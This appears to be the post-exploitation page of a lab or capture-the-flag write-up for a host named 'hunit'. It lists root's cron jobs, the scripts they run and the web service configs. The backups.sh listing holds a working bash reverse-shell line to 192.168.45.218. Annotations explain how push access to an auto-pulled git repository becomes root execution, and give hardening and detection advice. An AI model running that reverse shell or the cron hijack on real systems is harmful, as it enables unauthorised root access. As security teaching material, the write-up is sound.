Beyond


This is the beyond page, where additional post-exploitation enumeration and assessment are conducted as the root user on the compromised target system.

Crontab


[root@hunit ~]# crontab -l
crontab -l
*/3 * * * * /root/git-server/backups.sh
*/2 * * * * /root/pull.sh

/root/git-server/backups.sh


[root@hunit ~]# cat /root/git-server/backups.sh
#!/bin/bash
#
#
# # Placeholder
#
# NOTE(review): these review lines annotate the captured listing; they are not
# part of the file on disk.
# The single command below starts an interactive bash whose stdin, stdout and
# stderr are attached to a TCP connection to 192.168.45.218:18030, i.e. a
# reverse shell.
# root's crontab runs this file every 3 minutes. It lives in /root/git-server,
# which /root/pull.sh refreshes with `git pull` every 2 minutes, so its content
# is whatever the repository's upstream holds.
# Presumably the original placeholder body was replaced through a pushed
# commit -- confirm against the repository history.
# Hardening: keep root-run cron scripts root-owned and outside any
# auto-updated working tree. Detection: a cron child process spawning an
# interactive shell with an outbound network connection.
bash -c "bash -i >& /dev/tcp/192.168.45.218/18030 0>&1"

/root/pull.sh


[root@hunit ~]# cat /root/pull.sh
#!/bin/bash
# Refreshes the /root/git-server working tree from its configured upstream.
# root's crontab runs this script every 2 minutes.
# NOTE(review): these review lines annotate the captured listing; they are not
# part of the file on disk.
# NOTE(review): the cd is unchecked, so if /root/git-server is missing the
# git pull below runs in whatever directory cron started the job in.
cd /root/git-server
# NOTE(review): anything the upstream serves is written into /root/git-server,
# and root's crontab also executes /root/git-server/backups.sh from that tree.
# Write access to the upstream repository is therefore equivalent to running
# commands as root. Who can push is not shown here -- verify the remote's
# access controls.
git pull

Web 8080


[root@hunit srv]# systemctl status gradleblog.service
 gradleblog.service - Gradle Blog
     Loaded: loaded (/etc/systemd/system/gradleblog.service; enabled; vendor preset: disabled)
     Active: active (running) since Fri 2024-08-02 20:52:40 UTC; 7 months 27 days ago
   Main PID: 454 (java)
      Tasks: 35 (limit: 4699)
     Memory: 323.9M
     CGroup: /system.slice/gradleblog.service
             └─454 /usr/bin/java -jar /home/dademola/blog.jar
 
 
 
[root@hunit srv]# cat /etc/systemd/system/gradleblog.service
[Unit]
Description=Gradle Blog
After=network-online.target
 
[Service]
Type=simple
PIDFile=/run/gradleblog.pid
ExecStart=/usr/bin/java -jar /home/dademola/blog.jar
User=dademola
ExecReload=/bin/kill -USR1 $MAINPID
Restart=on-failure
 
[Install]
WantedBy=multi-user.target

/usr/bin/java -jar /home/dademola/blog.jar

Web 18030


[root@hunit srv]# cat /etc/httpd/conf/httpd.conf | grep -v '^[#/]'
 
ServerRoot "/etc/httpd"
 
 
Listen 18030
 
LoadModule mpm_event_module modules/mod_mpm_event.so
LoadModule authn_file_module modules/mod_authn_file.so
LoadModule authn_core_module modules/mod_authn_core.so
LoadModule authz_host_module modules/mod_authz_host.so
LoadModule authz_groupfile_module modules/mod_authz_groupfile.so
LoadModule authz_user_module modules/mod_authz_user.so
LoadModule authz_core_module modules/mod_authz_core.so
LoadModule access_compat_module modules/mod_access_compat.so
LoadModule auth_basic_module modules/mod_auth_basic.so
LoadModule reqtimeout_module modules/mod_reqtimeout.so
LoadModule include_module modules/mod_include.so
LoadModule filter_module modules/mod_filter.so
LoadModule mime_module modules/mod_mime.so
LoadModule log_config_module modules/mod_log_config.so
LoadModule env_module modules/mod_env.so
LoadModule headers_module modules/mod_headers.so
LoadModule setenvif_module modules/mod_setenvif.so
LoadModule version_module modules/mod_version.so
LoadModule slotmem_shm_module modules/mod_slotmem_shm.so
LoadModule unixd_module modules/mod_unixd.so
LoadModule status_module modules/mod_status.so
LoadModule autoindex_module modules/mod_autoindex.so
<IfModule !mpm_prefork_module>
	#LoadModule cgid_module modules/mod_cgid.so
</IfModule>
<IfModule mpm_prefork_module>
	#LoadModule cgi_module modules/mod_cgi.so
</IfModule>
LoadModule negotiation_module modules/mod_negotiation.so
LoadModule dir_module modules/mod_dir.so
LoadModule userdir_module modules/mod_userdir.so
LoadModule alias_module modules/mod_alias.so
 
<IfModule unixd_module>
User http
Group http
 
</IfModule>
 
 
ServerAdmin you@example.com
 
 
<Directory />
    AllowOverride none
    Require all denied
</Directory>
 
 
DocumentRoot "/srv/http"
<Directory "/srv/http">
    Options Indexes FollowSymLinks
    AllowOverride None
    Require all granted
</Directory>
 
<IfModule dir_module>
    DirectoryIndex index.html
</IfModule>
 
<Files ".ht*">
    Require all denied
</Files>
 
ErrorLog "/var/log/httpd/error_log"
LogLevel warn
 
<IfModule log_config_module>
    LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
    LogFormat "%h %l %u %t \"%r\" %>s %b" common
    <IfModule logio_module>
      LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %I %O" combinedio
    </IfModule>
    CustomLog "/var/log/httpd/access_log" common
</IfModule>
 
<IfModule alias_module>
    ScriptAlias /cgi-bin/ "/srv/http/cgi-bin/"
</IfModule>
 
<IfModule cgid_module>
</IfModule>
 
<Directory "/srv/http/cgi-bin">
    AllowOverride None
    Options None
    Require all granted
</Directory>
 
<IfModule headers_module>
    RequestHeader unset Proxy early
</IfModule>
 
<IfModule mime_module>
    TypesConfig conf/mime.types
    AddType application/x-compress .Z
    AddType application/x-gzip .gz .tgz
</IfModule>
 
Include conf/extra/httpd-multilang-errordoc.conf
Include conf/extra/httpd-autoindex.conf
Include conf/extra/httpd-languages.conf
Include conf/extra/httpd-userdir.conf
Include conf/extra/httpd-default.conf
 
<IfModule proxy_html_module>
Include conf/extra/proxy-html.conf
</IfModule>
 
<IfModule ssl_module>
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
</IfModule>